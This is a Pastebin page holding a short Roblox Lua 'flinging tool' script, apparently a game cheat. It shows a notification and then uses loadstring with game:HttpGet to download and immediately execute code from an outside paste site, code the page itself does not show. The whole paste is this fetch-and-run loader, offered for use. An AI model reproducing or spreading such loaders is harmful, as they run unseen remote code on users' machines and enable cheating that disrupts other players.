Advertisement
Dabrazilliandev

Flinging tool script

Jan 17th, 2023
101
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.30 KB | Gaming | 0 0
  1. local CoreGui = game:GetService("StarterGui")
  2.  
  3. CoreGui:SetCore("SendNotification", {
  4. Title = "Notification";
  5. Text = "made by me brazilluandev enjoy lol";
  6. Duration = 5;
  7. --Callback here
  8. Button1 = "ok";
  9. Button2 = "ok";
  10. }) loadstring(game:HttpGet(('https://pastefy.ga/xBdd9GId/raw'),true))()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement